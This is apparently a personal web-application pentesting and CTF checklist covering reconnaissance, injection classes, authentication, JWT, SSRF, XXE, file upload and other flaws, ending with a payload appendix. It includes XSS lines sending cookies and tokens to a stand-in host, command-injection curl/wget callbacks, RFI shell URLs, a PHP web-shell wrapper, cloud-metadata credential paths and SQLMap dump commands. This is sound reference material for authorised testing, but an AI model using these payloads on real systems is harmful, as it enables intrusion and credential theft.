Sanity check

This is my sanity check I use on CTFs, exams, and pentests. If you see something missing here, don't hesitate to tell me.

Sanity Check

0. Initial Reconnaissance

• Technology fingerprinting

  • Wappalyzer, BuiltWith, WhatWeb

  • Check response headers (Server, X-Powered-By, X-AspNet-Version)

  • Framework detection (error messages, default pages, URL patterns)

  • Check for WAF: wafw00f <URL>

• Surface mapping

  • robots.txt, sitemap.xml, security.txt

  • Check for backup files: .bak, .old, .swp, ~, .git, .env

  • Look for API docs: /api/docs, /swagger, /graphql, /api-docs

  • Default creds research for identified tech stack

• Wordlist preparation

  • Use ChatGPT to generate context-specific wordlists

  • Merge with SecLists for comprehensive coverage

---

1. Fuzzing & Discovery

• Directory & file fuzzing

  • Fuzz all endpoints (API, directories, internal paths, file extensions)

  • If API endpoint like /api/v1/my-profile, fuzz version: /api/FUZZ/my-profile

  • Test alternative extensions: .php, .html, .txt, .bak, .json, .xml

  • Test HTTP methods on discovered endpoints (GET, POST, PUT, PATCH, DELETE, OPTIONS, HEAD)

• Parameter discovery

  • Fuzz parameters in GET/POST (Arjun, ParamSpider)

  • Test for hidden parameters in GraphQL (field suggestions)

  • Check for alternate parameter names (id vs user_id vs userId)

• Content exposure

  • Check for excessive data in responses (information disclosure)

  • Look for debug endpoints (/debug, /test, /admin, /dev)

  • Check for commented-out code in HTML/JS

---

2. Authentication & Session Management

Username Enumeration

• Timing differences

  • Compare response time between known-good and non-existent users

  • Test with large passwords on valid vs invalid users

• Response variations

  • Difference in response length/content

  • Distinct error messages ("User not found" vs "Invalid password")

  • Account lockout behavior differences

• Registration bypass

  • Try registering existing usernames

  • Check if registration reveals user existence

Authentication Bypass

• Default credentials

  • Test common defaults for discovered technology

• SQL injection in auth

  • ' OR 1=1-- -

  • admin'-- -

  • NoSQL: {"username": "admin", "password": {"$ne": ""}}

• Password reset flaws

  • Token predictability (Burp Sequencer)

  • Token reuse

  • Account takeover via parameter manipulation

  • Reset link doesn't expire

  • Host header injection in reset emails

Brute Force Protection

• Rate limiting bypass

  • IP spoofing headers: X-Forwarded-For, X-Real-IP, X-Originating-IP, Client-IP, True-Client-IP

  • Rotate User-Agent

  • Add null bytes or case variations to username

  • Test if lockout is per-user or per-IP

Multi-Factor Authentication (MFA)

• MFA bypass techniques

  • Brute force MFA token (if short/numeric)

  • SQLi in MFA token field

  • Direct navigation to post-MFA endpoint

  • MFA token reuse across accounts

  • Missing MFA on password change/critical actions

  • Race condition on MFA validation

Token Analysis

• JWT exploitation (see dedicated JWT section)

• Session tokens

  • Burp Sequencer analysis for randomness

  • Base64 decode to inspect structure

  • Test for predictable patterns

  • Session fixation

  • Session doesn't expire on logout

• Cookie security

  • Missing HttpOnly flag (XSS → session hijacking)

  • Missing Secure flag

  • SameSite attribute set to None (CSRF risk)

  • Overly long expiration

---

3. SQL Injection

Detection

• Basic payloads

  • ' (single quote)

  • " (double quote)

  • ' OR 1=1-- -

  • " OR 1=1-- -

• Test locations

  • URL parameters

  • POST body (form data, JSON, XML)

  • Headers (User-Agent, Referer, X-Forwarded-For)

  • Cookies

  • MFA tokens

  • File upload metadata

Exploitation

• Union-based

  • ORDER BY 1 through ORDER BY 20 to find column count

  • UNION SELECT NULL,NULL,NULL-- - (match column count)

  • UNION SELECT 1,2,3-- - (identify injectable columns)

  • Test with both + (plus) and %20 (space) encoding

• Blind SQLi

  • Boolean-based: ' AND 1=1-- - vs ' AND 1=2-- -

  • Time-based: ' AND SLEEP(5)-- - or '; WAITFOR DELAY '00:00:05'-- -

• Second-order SQLi

  • Inject payload during registration/profile update

  • Trigger on subsequent query (profile view, search results)

• NoSQL Injection

  • Operators: $eq, $ne, $gt, $gte, $lt, $lte, $regex

  • Login bypass: {"username": "admin", "password": {"$ne": ""}}

  • ID bypass: ?id[$ne]=null

  • Injection in MongoDB: {$where: 'sleep(5000)'}

SQLMap

• sqlmap -u "URL" --level=5 --risk=3 --dump

• sqlmap -r request.txt --level=5 --risk=3 --dump

• Test with authentication: -H "Authorization: Bearer TOKEN"

• Ensure correct endpoint spelling (common mistake)

---

4. Cross-Site Scripting (XSS)

Context Analysis

• Reflected XSS

  • Is input immediately reflected in response?

  • Where does it appear? (HTML body, attribute, script tag, URL)

• Stored XSS

  • Input stored and rendered later (comments, profiles, posts)

  • Check if rendered on different pages/contexts

• DOM-based XSS

  • Search frontend code for: document.write(), innerHTML, outerHTML, eval(), setTimeout(), setInterval()

  • Look for URL parameters directly manipulated in JavaScript

Filter Bypass

• Tag/attribute testing

  • Test which tags work: <h1>, <script>, <img>, <svg>, <iframe>, <object>

  • Test event handlers: onerror, onload, onclick, onmouseover

• Obfuscation

  • Nested tags: <scrscriptipt>alert()</scriscriptpt>

  • Case variation: <ScRiPt>alert()</sCrIpT>

  • Encoding: HTML entities, Unicode, hex

  • WAF evasion: Add 10,000+ characters before payload

• Special contexts

  • JavaScript string: '-alert()-'

  • Attribute value: " onload=alert() "

  • href attribute: javascript:alert()

  • <base href> injection to hijack relative URLs

Basic Payloads

<h1>Test</h1>
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<scrscriptipt>alert(1)</scriscriptpt>

Advanced Exploitation

Exfiltrate localStorage token:

<img src=x onerror="fetch('https://COLLAB/?c='+btoa(localStorage.getItem('token')),{mode:'no-cors'})">

Exfiltrate cookies:

<script>
fetch('https://COLLAB', {
  method:'POST',
  mode:'no-cors',
  body:document.cookie
});
</script>

CSRF via XSS:

<script>
fetch('http://localhost:3000/task/create', {
  method:'POST',
  headers:{'Content-Type':'application/x-www-form-urlencoded'},
  credentials:'include',
  body:'title=Hacked&status=pending&description=pwned'
});
</script>

Note: URL-encode entire payload if inserting into a URL parameter

---

5. Cross-Site Request Forgery (CSRF)

• Check for CSRF tokens

  • Are tokens present on all state-changing operations?

  • Test with random/invalid token

  • Test without token

  • Token tied to session?

• HTTP method override

  • Change POST to GET (move parameters to URL)

  • Test if GET requests trigger state changes

• SameSite cookie attribute

  • Is SameSite set to None or Lax?

  • Exploit via subdomain or top-level navigation

• Referer/Origin validation

  • Missing validation

  • Weak validation (substring match)

---

6. Server-Side Request Forgery (SSRF)

Discovery

• Input points

  • URL parameters (?url=, ?image=, ?proxy=)

  • File upload (avatar URL, image import)

  • Webhooks

  • PDF generators (HTML to PDF with external resources)

• Confirmation

  • Burp Collaborator to confirm outbound requests

  • Listen on your VPS: nc -lvnp 80

Exploitation

• Bypass filters

  • Alternative IP notation: 127.0.0.1 → 0x7f.0x0.0x0.0x1 (hex)

  • Decimal notation: 2130706433 (127.0.0.1 in decimal)

  • Octal: 0177.0.0.1

  • IPv6: ::1, ::ffff:127.0.0.1

  • DNS rebinding

  • Open redirect to internal URL

  • Use localhost.COLLAB.com if only localhost is allowed

• Port scanning

  • http://127.0.0.1:[PORT] (common ports: 22, 80, 443, 3306, 5432, 6379, 27017, 8080, 8443)

• Internal network enumeration

  • Fuzz private IP ranges:

    • 10.0.0.0/8

    • 172.16.0.0/12

    • 192.168.0.0/16

Cloud Metadata Endpoints

AWS:

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE_NAME]
http://169.254.169.254/latest/user-data/

GCP:

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/project/project-id
(Header required: Metadata-Flavor: Google)

Azure:

http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
(Header required: Metadata: true)

---

7. File Inclusion

Setup

• Burp configuration

  • Disable CSS/image filters in Burp Proxy → Options

Local File Inclusion (LFI)

• Basic payloads

  • ../../../etc/passwd (Linux)

  • ..\..\..\..\windows\system32\drivers\etc\hosts (Windows)

• Bypass techniques

  • Double encoding: ....//....//....//etc/passwd

  • Null byte injection: ../../../etc/passwd%00 (older PHP)

  • Path traversal with absolute paths: /var/www/html/../../../etc/passwd

• PHP wrappers

  • php://filter/convert.base64-encode/resource=index.php (read source)

  • php://input + POST body (RCE)

  • data://text/plain,<?php system($_GET['cmd']); ?> (RCE)

  • expect://whoami (if expect extension enabled)

• Log poisoning

  • Inject PHP into logs (User-Agent, SSH logs)

  • Include log file: /var/log/apache2/access.log

Remote File Inclusion (RFI)

• http://attacker.com/shell.php

• Obfuscation: hthttptp://attacker.com/shell.php

• SMB share (Windows): \\attacker.com\share\shell.php

RCE via File Inclusion

• Upload malicious file, then include it

• Chain with file upload vulnerability

---

8. XML External Entity (XXE)

Discovery

• Endpoints accepting XML

  • POST body with Content-Type: application/xml

  • File upload (SVG, DOCX, XLSX, PDF)

  • SOAP requests

Basic XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

XInclude Attack

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Blind XXE (OOB)

<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://COLLAB">
%xxe;
]>

XXE to SSRF

• Target internal services

• Retrieve cloud metadata

• Port scanning via error messages

---

9. Server-Side Template Injection (SSTI)

Detection

• Template syntax testing

  • {{7*7}} (Jinja2, Twig)

  • ${7*7} (Freemarker, Velocity)

  • <%= 7*7 %> (ERB)

  • #{7*7} (Thymeleaf)

• Context matters

  • Check response in Burp if not visible in frontend

  • Test in URL parameters, form inputs, headers

Exploitation

Jinja2 (Python):

{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}

Twig (PHP):

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

---

10. Command Injection

Detection

• Basic separators

  • ;whoami

  • &&whoami

  • ||whoami

  • |whoami

  • Backticks: `whoami`

  • $(whoami)

Blind Command Injection

• Time-based

  • ; sleep 10

  • ; ping -c 10 127.0.0.1

• Out-of-band (OOB)

  • ; curl http://COLLAB

  • ; wget http://COLLAB

  • ; nslookup COLLAB

Bypass Filters

• Obfuscation

  • w''h''o''a''m''i

  • who$@ami

  • \whoami

  • Hex encoding: $(echo 77686f616d69 | xxd -r -p)

---

11. Insecure Deserialization

Discovery

• Look for serialized data

  • Base64-encoded cookies/parameters (decode and inspect)

  • Common signatures:

    • Java: rO0 (start of serialized Java object)

    • Python pickle: ( or hex 80 03

    • PHP: O: followed by class name

Exploitation

• Modify object properties

  • Change user role/permissions in serialized object

• RCE via gadget chains

  • Use ysoserial (Java)

  • Research known gadgets for detected framework

---

12. JWT (JSON Web Tokens)

Analysis

• Decode JWT

  • Use jwt.io or jwt_tool

  • Inspect header, payload, signature

• Signature verification bypass

  • Remove signature completely (some parsers accept unsigned tokens)

  • Change alg to none

  • Change alg from RS256 to HS256 (algorithm confusion)

• Brute force secret

  • hashcat -a 0 -m 16500 <JWT> /usr/share/wordlists/rockyou.txt

  • jwt_tool <JWT> -C -d /usr/share/wordlists/rockyou.txt

• Header injection

  • jku (JWK Set URL) → point to attacker-controlled JSON

  • jwk (JSON Web Key) → embed your own public key

  • kid (Key ID) → path traversal, SQL injection, command injection

  • x5u (X.509 URL) → SSRF or malicious certificate

• Payload manipulation

  • Change user, role, id, email

  • Add isAdmin: true or similar claims

  • Extend expiration (exp claim)

• Cross-service attacks

  • Use JWT from one microservice on another

• Analyze with jwt_tool

  • jwt_tool <JWT> -M at (all tests)

  • jwt_tool <JWT> -X i (inject new claims)

---

13. Insecure File Upload

Bypass Filters

• Extension tricks

  • Double extension: shell.php.jpg

  • Null byte: shell.php%00.jpg (older systems)

  • Case variation: shell.PhP

  • Alternative extensions: .phtml, .php3, .php4, .php5, .phar

• Content-Type manipulation

  • Upload PHP but set Content-Type: image/jpeg

• Magic byte bypass

  • Prepend valid file signature (e.g., JPEG: FF D8 FF)

Exploitation

• Remote Code Execution

  • Upload web shell, then access via URL

  • If path not predictable, use path traversal in filename

• Path traversal in filename

  • ../../var/www/html/shell.php

• XXE via SVG/XML

  • Upload malicious SVG with XXE payload

• XSS via file content

  • Upload HTML with XSS payload

  • Upload SVG with embedded JavaScript

Access Control

• Are uploaded files publicly accessible?

• Can other users access your uploads?

---

14. Business Logic Flaws

• Price manipulation

  • Negative prices: -100

  • Zero prices: 0

  • Decimal abuse: 0.01

• Coupon/voucher abuse

  • Apply multiple codes (array or repeated parameters)

    "discount": ["CODE1", "CODE2", "CODE3"]

  • Reuse single-use codes

• Quantity manipulation

  • Negative quantities to gain credit

  • Integer overflow

• Workflow bypass

  • Skip steps in multi-step process (checkout, registration)

  • Access restricted functionality by direct URL

• Race conditions (see dedicated section)

---

15. Broken Access Control

Horizontal Privilege Escalation

• IDOR (Insecure Direct Object Reference)

  • Change IDs in URL: /user/123 → /user/124

  • Change IDs in POST body: {"user_id": 123} → {"user_id": 124}

  • Test numeric, UUID, sequential IDs

  • Replace UUID with null UUID (00000000-0000-0000-0000-000000000000) to trigger error messages / information disclosure

Vertical Privilege Escalation

• Forceful browsing

  • /admin, /dashboard, /api/admin

• Function-level access control

  • Change GET to PUT/PATCH/DELETE on read-only endpoint

  • Test CRUD operations on resources you shouldn't access

• Parameter-based access control

  • Add admin=true, role=admin to requests

  • Manipulate JWT/session tokens (see JWT section)

Method-Based Bypass

• HTTP method override

  • If GET /users/123 is allowed, try PUT/PATCH/DELETE

---

16. API Security

REST API Testing

• HTTP methods

  • OPTIONS (check allowed methods)

  • HEAD, PUT, PATCH, DELETE on all endpoints

• Version fuzzing

  • /api/v1/users → test /api/v2/users, /api/v3/users

  • Also test: /api/users, /api/FUZZ/users

• Mass assignment

  • Add unexpected parameters: isAdmin, role, verified

  • Check for parameter leakage in responses

• Rate limiting

  • Test for missing rate limits on sensitive endpoints

GraphQL

• Introspection

  • Query: {__schema{types{name,fields{name}}}}

  • Visualize with https://apis.guru/graphql-voyager/

• Information disclosure

  • Query extra fields not shown in UI

  • Use field suggestions: trigger autocomplete by sending incomplete query

  • Field stuffing: request all possible fields in a query

• Alias abuse

  • Use aliases to bypass rate limiting or query depth limits

    {
      user1: user(id: 1) { name }
      user2: user(id: 2) { name }
      ...
      user100: user(id: 100) { name }
    }

• Batch attacks

  • Brute force login with single request:

    [
      {query: "mutation {login(user:\"admin\",pass:\"pass1\"){token}}"},
      {query: "mutation {login(user:\"admin\",pass:\"pass2\"){token}}"}
    ]

• Circular queries (DoS)

  • Deeply nested or recursive queries

• Injection attacks

  • SQLi, NoSQLi, IDOR in query arguments

WebSockets

• Identify WebSocket connections

  • Look for Upgrade: websocket in HTTP responses

  • Check JavaScript for new WebSocket()

• WebSocket hijacking

  • Handshake relies on cookies (no CSRF token)

  • SameSite cookie is None

  • Missing origin validation

• Message injection

  • Send unexpected messages to server

  • Test for injection in WebSocket data (XSS, SQLi, etc.)

---

17. Prototype Pollution

Client-Side

• URL-based

  • ?__proto__[isAdmin]=true

  • ?__proto__[key]=<img src=x onerror=alert()>

  • URL-encode payload if needed

• JSON-based

  {
    "__proto__": {
      "isAdmin": true
    }
  }

Server-Side

• Test in JSON body

  {
    "__proto__": {
      "status": 599
    }
  }

• Look for vulnerable code patterns

  • Object.assign(), spread operator (...), merge(), extend()

• Bypass filters

  • __pro__proto__to__ (if __proto__ is filtered)

  • constructor.prototype

• Tools

  • DOM Invader (Burp Suite extension)

  • Server-side Prototype Pollution Scanner (Burp extension)

---

18. Cross-Origin Resource Sharing (CORS)

• Misconfigured CORS

  • Reflected Origin: Access-Control-Allow-Origin: <attacker.com>

  • Null origin: Access-Control-Allow-Origin: null

  • Wildcard with credentials: Access-Control-Allow-Origin: * + Access-Control-Allow-Credentials: true

• Subdomain takeover → CORS bypass

• Pre-flight request bypass

  • Check if OPTIONS request is required

  • Test simple requests (GET/POST with standard headers)

---

19. HTTP Request Smuggling

• Identify vulnerable setup

  • Frontend/backend architecture (proxy, CDN, load balancer)

• Test for CL.TE / TE.CL discrepancies

  • Conflicting Content-Length and Transfer-Encoding headers

• Exploitation

  • Smuggle requests to poison cache

  • Bypass access controls

  • Capture other users' requests

---

20. Cache Poisoning

• Unkeyed headers to test

  • X-Forwarded-Host: attacker.com (manipulate hrefs, scripts)

  • X-Forwarded-Scheme: http (downgrade HTTPS)

  • X-Original-URL: /admin

  • X-Rewrite-URL: /admin

  • Accept-Language: en-GB

  • User-Agent: <script>alert()</script>

• Cache keys

  • Identify what's included in cache key (URL, Host, query params)

  • Find unkeyed inputs that affect response

• Confirm caching

  • Look for X-Cache, Age, Cache-Control headers

  • Send requests with unique cachebuster, then repeat without it

---

21. Race Conditions

• Identify vulnerable processes

  • Multi-step workflows (checkout, payment, redemption)

  • Duplicate action scenarios (redeem coupon, apply credit, confirm purchase)

• Exploitation

  • Use Burp Turbo Intruder or custom script

  • Send simultaneous requests to race the condition

• High-value targets

  • Gift card / voucher redemption

  • One-time use tokens

  • Password reset links

  • Balance/credit systems

---

22. Out-of-Band (OOB) Exploitation

Triggers for OOB

• Document rendering (HTML → PDF)

  • <link href='http://COLLAB' rel='stylesheet'>

  • <script src='http://COLLAB'></script>

  • <img src='http://COLLAB'>

  • <iframe src='http://COLLAB'>

• SVG uploads

  <svg xmlns="http://www.w3.org/2000/svg">
    <image href="http://COLLAB"/>
  </svg>

• XXE (see XXE section)

• SSRF (see SSRF section)

• Command injection

  • curl http://COLLAB

  • wget http://COLLAB

Bypassing localhost restrictions

• If only localhost is allowed, try localhost.COLLAB.com

• DNS rebinding

---

23. Type Confusion / Type Juggling

• Test type coercion

  • Send string where integer expected: "123" vs 123

  • Send array where string expected: ["value"]

  • Send boolean where number expected: true vs 1

• PHP loose comparison

  • "0e123" == "0e456" (both evaluate to 0)

  • "abc" == 0 (true in PHP)

---

24. Client-Side Security

JavaScript Analysis

• Sensitive data in JS

  • API keys, tokens, credentials

  • Hardcoded secrets

  • Source maps (.map files)

• Client-side validation only

  • Bypass checks by manipulating JS or requests

• Vulnerable libraries

  • Check for known CVEs in third-party libraries (Retire.js)

Subdomain Takeover

• Identify dangling DNS records

  • CNAME pointing to service no longer claimed (GitHub Pages, AWS S3, Heroku, etc.)

---

25. Security Misconfigurations

• Default/example pages

  • Apache, nginx, Tomcat default pages

• Directory listing enabled

• Verbose error messages

  • Stack traces, database errors, version info

• Missing security headers

  • X-Frame-Options (clickjacking)

  • X-Content-Type-Options (MIME sniffing)

  • Strict-Transport-Security (HSTS)

  • Content-Security-Policy (XSS/data injection)

• HTTP method OPTIONS

  • Check for allowed methods

---

Exploitation Payloads

XSS Payloads

Basic:

<h1>Test</h1>
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>

Advanced - Token Exfiltration:

<img src=x onerror="fetch('https://COLLAB/?c='+btoa(localStorage.getItem('token')),{mode:'no-cors'})">

Cookie Theft:

<script>
fetch('https://COLLAB', {
  method:'POST',
  mode:'no-cors',
  body:document.cookie
});
</script>

CSRF via XSS:

<script>
fetch('http://localhost:3000/task/create', {
  method:'POST',
  headers:{'Content-Type':'application/x-www-form-urlencoded'},
  credentials:'include',
  body:'title=Hacked&status=pending'
});
</script>

SQLMap

# Basic scan
sqlmap -u "https://target.com/profile" -H "Authorization: Bearer TOKEN" --level=5 --risk=3 --dump

# From request file
sqlmap -r request.txt --level=5 --risk=3 --dump

# Specific database/table
sqlmap -u "URL" --level=5 --risk=3 -D database_name -T table_name --dump

JWT Cracking

# Hashcat
hashcat -a 0 -m 16500 <JWT> /usr/share/wordlists/rockyou.txt

# jwt_tool
jwt_tool <JWT> -C -d /usr/share/wordlists/rockyou.txt
jwt_tool <JWT> -X a  # all attacks

XXE Payloads

Basic file read:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

XInclude:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Blind XXE (OOB):

<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://COLLAB/evil.dtd">
%xxe;
]>

SSTI Payloads

Detection:

{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}

Jinja2 RCE:

{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}

Prototype Pollution

URL-based:

?__proto__[isAdmin]=true
?__proto__[message]=<img src=x onerror=alert()>

JSON-based:

{
  "__proto__": {
    "isAdmin": true
  }
}

Server-side:

{
  "__proto__": {
    "status": 599
  }
}

OOB Data Exfiltration

HTML/PDF rendering:

<link href='http://COLLAB' rel='stylesheet'>
<script src='http://COLLAB'></script>
<img src='http://COLLAB'>
<div style='background: url("http://COLLAB")'></div>

SVG:

<svg xmlns="http://www.w3.org/2000/svg">
  <image href="http://COLLAB"/>
</svg>

---

Hash Recognition

Hash Type	Length	Character Set	Example
MD5	32 hex chars	[a-f0-9]	5d41402abc4b2a76b9719d911017c592
SHA-1	40 hex chars	[a-f0-9]	aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
SHA-256	64 hex chars	[a-f0-9]	2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e...
SHA-512	128 hex chars	[a-f0-9]	9b71d224bd62f3785d96d46ad3ea3d73319bfbc...
bcrypt	60 chars	Starts with $2a$, $2b$, or $2y$	$2a$10$N9qo8uLOickgx2ZMRZoMye...
sha256crypt	Variable	Starts with $5$	$5$rounds=5000$salt$hash...
sha512crypt	Variable	Starts with $6$	$6$rounds=5000$salt$hash...

Quick Identification Tips

• By length: 32 = MD5, 40 = SHA-1, 64 = SHA-256, 128 = SHA-512

• By prefix: $2a$ = bcrypt, $5$ = sha256crypt, $6$ = sha512crypt, $apr1$ = Apache MD5

• Tools: hashid <hash> or hashcat --identify <hash> or hash-identifier

• Hashcat modes: MD5 = -m 0, SHA-1 = -m 100, SHA-256 = -m 1400, bcrypt = -m 3200

---

Low-Hanging Fruit (Quick Wins)

• Default pages/credentials

• Server version disclosure (even in responses)

• No account lockout policy

• Username enumeration via error messages

• Outdated software versions (Wappalyzer)

• Weak password policy (no complexity requirements)

• Missing MFA

• Missing HttpOnly flag on cookies

• Auto-login after registration (session fixation risk)

• Circular GraphQL queries (DoS)

---